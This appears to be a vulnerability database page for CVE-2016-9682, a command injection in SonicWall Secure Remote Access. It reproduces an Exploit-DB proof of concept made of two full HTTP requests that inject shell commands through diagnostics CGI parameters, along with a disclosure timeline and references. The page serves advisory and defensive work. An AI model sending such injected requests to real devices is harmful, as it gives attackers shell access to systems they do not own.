CVE-2016-9682
Description
The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in its web administrative interface. These vulnerabilities occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile' or 'currentTSREmailTo' variables before making a call to system(), allowing for remote command injection. Exploitation of this vulnerability yields shell access to the remote machine under the nobody user account.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection
Sonicwall Secure Remote Access (SRA) - Command Injection Vulnerabilities
Vendor: Sonicwall (Dell)
Product: Secure Remote Access (SRA)
Version: 8.1.0.2-14sv
Platform: Embedded Linux
Discovery: Russell Sanford of Critical Start (www.CriticalStart.com)
CVE: cve-2016-9682
Tested against version 8.1.0.2-14sv on 11/28/16 (fully updated)
Description:
The Sonicwall Secure Remote Access server (ver 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in it's
web administrative interface. These vulnerabilies occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for
emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile'
or 'currentTSREmailTo' variables before making a call to system() allowing for remote command injection.
Exploitation of this vulnerability yeilds shell access to the remote machine under the useraccount 'nobody'
Impact:
Remote Code Execution
Exploit #1 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrEmailCurrent=true¤tTSREmailTo=|date>/tmp/xort||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=license; swap=dEVySFNhTXl5V3NLSXNWUFUzVzBNNTJJQ1o2WXpCODNrOGZYUGxYazJOZz0=
Exploit #2 -----------------------------------------------------------------
GET /cgi-bin/diagnostics?tsrDeleteRestarted=true&tsrDeleteRestartedFile=|date>/tmp/xort2||a%20%23 HTTP/1.1
Host: 192.168.84.155
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.84.155/cgi-bin/diagnostics
Cookie: SessURL=https%3A%2F%2F192.168.84.155%2Fcgi-bin%2Fwelcome; svDomainName=LocalDomain; activeUserSessionsTable=0; ajaxUpdates=ON; activeNxSessionsTable=0; servicesBookmarksTable=1; policyListTable=1; portalListTable=1; domainListTable=0; period=1; activeTab=4; curUrl=sslcert; swap=dDdWMjhSYzlzMEZBd3kwQ29rTzZxQWFKdmxUSU5SRFVBQTRGRWk5UzJXVT0=
Timeline:
11/14/16 - Discovered in audit
11/20/16 - POC msf exploit written
11/28/16 - Contacted mitre for CVE
11/30/16 - CVE received from mitre (CVE-2016-9682)
11/30/16 - Dell notified through Sonicwall vuln reportingReferences
- http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.7/release-notes/resolved-issues?ParentProduct=868
- http://www.securityfocus.com/bid/96375
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0003
- https://www.exploit-db.com/exploits/42342/
- http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.7/release-notes/resolved-issues?ParentProduct=868
- http://www.securityfocus.com/bid/96375
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0003
- https://www.exploit-db.com/exploits/42342/
CWEs
CWE-77
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.